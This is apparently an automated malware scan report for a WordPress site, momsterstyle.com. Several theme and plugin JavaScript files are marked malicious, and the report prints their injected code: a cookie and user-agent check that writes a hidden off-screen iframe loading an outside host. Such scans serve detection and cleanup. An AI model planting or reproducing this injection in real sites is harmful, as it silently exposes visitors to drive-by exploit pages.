Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=momsterstyle.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://momsterstyle.com/ | 200 OK Content-Length: 29991 Content-Type: text/html | clean |
http://cache-02.cleanprint.net/cpf/cleanprint?key=cleansave-wp&logo=http%3A%2F%2Fcache-02.cleanprint.net%2Fmedia%2Flogos%2FCleanSave.png&buttons=help,print,gcp,pdf,rtf,email,dropbox,googleDocs,boxDotNet,kindle,group:edit,group:share | 200 OK Content-Length: 7610 Content-Type: text/javascript | clean |
http://momsterstyle.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 94721 Content-Type: application/javascript | clean |
http://momsterstyle.com/wp-content/plugins/rotatingtweets/js/jquery.cycle.all.min.js?ver=3.5.1 | 200 OK Content-Length: 27265 Content-Type: application/javascript | clean |
http://momsterstyle.com/wp-content/plugins/rotatingtweets/js/rotating_tweet.js?ver=3.5.1 | 200 OK Content-Length: 13409 Content-Type: application/javascript | clean |
http://momsterstyle.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3 | 200 OK Content-Length: 11049 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.glencoevillabnb.co.uk/igibabunter16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75 var nextlink = document.getElementById('prevpic'); var prevlink = document.getElementById('nextpic'); var closelink = document.getElementById('shTopImg'); switch (code) { case 39: if (prevlink) prevlink.onclick(); break; case 37: if (nextlink) nextlink.onclick(); break; case 27: if (closelink) closelink.onclick(); break; } } } Antivirus reports:
| ||
http://momsterstyle.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 2854 Content-Type: application/javascript | clean |
http://momsterstyle.com/wp-includes/js/comment-reply.min.js?ver=3.5.1 | 200 OK Content-Length: 1849 Content-Type: application/javascript | clean |
http://js.embad.com/build/Initializer.js?pid=548&wsid=720 | 200 OK Content-Length: 5208 Content-Type: application/x-javascript | clean |
http://momsterstyle.com/wp-content/themes/adventure/js/jquery.easing.js?ver=1.3 | 200 OK Content-Length: 101728 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.glencoevillabnb.co.uk/igibabunter16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75 Antivirus reports:
| ||
http://momsterstyle.com/wp-content/themes/adventure/js/jquery.menu.scrolling.js?ver=1 | 200 OK Content-Length: 1778 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.glencoevillabnb.co.uk/igibabunter16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75 } else if (document.documentElement.clientWidth <= 600){ if ($(window).scrollTop() <= 90){ $('#navi').removeClass('small'); } } else if (document.documentElement.clientWidth <= 900){ if ($(window).scrollTop() <= 118){ $('#navi').removeClass('small'); } } else { if ($(window).scrollTop() <= 140){ $('#navi').removeClass('small'); } } } Antivirus reports:
| ||
http://momsterstyle.com/wp-content/themes/adventure/js/jquery.fittext.js?ver=1.0 | 200 OK Content-Length: 2181 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.glencoevillabnb.co.uk/igibabunter16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75 if ( options ) { $.extend( settings, options ); } var resizer = function () { $this.css('font-size', Math.max(Math.min($this.width() / (compressor*10), parseFloat(settings.maxFontSize)), parseFloat(settings.minFontSize))); }; resizer(); $(window).resize(resizer); }); }; })( jQuery ); Antivirus reports:
| ||
http://momsterstyle.com/wp-content/themes/adventure/js/jquery.fittext.sizing.js?ver=1 | 200 OK Content-Length: 1133 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.glencoevillabnb.co.uk/igibabunter16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75 $("#fittext3").fitText(1.3, { minFontSize: 30, maxFontSize: '98px' }); Antivirus reports:
| ||
http://momsterstyle.com/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-en.js?ver=2.5.9.4 | 200 OK Content-Length: 10469 Content-Type: application/javascript | clean |
http://momsterstyle.com/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.5.9.4 | 200 OK Content-Length: 72808 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: momsterstyle.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 17:29:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 29991
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_3210805887=54aebe7feb8d2; expires=Thu, 08-Jan-2015 17:59:35 GMT; path=/
X-Pingback: http://momsterstyle.com/xmlrpc.php
...29991 bytes of data.
GET / HTTP/1.1
Host: momsterstyle.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 17:29:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 29991
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_3210805887=54aebe7feb8d2; expires=Thu, 08-Jan-2015 17:59:35 GMT; path=/
X-Pingback: http://momsterstyle.com/xmlrpc.php
...29991 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: momsterstyle.com
Referer: http://www.google.com/search?q=momsterstyle.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: momsterstyle.com
Referer: http://www.google.com/search?q=momsterstyle.com
Result:
The result is similar to the first query. There are no suspicious redirects found.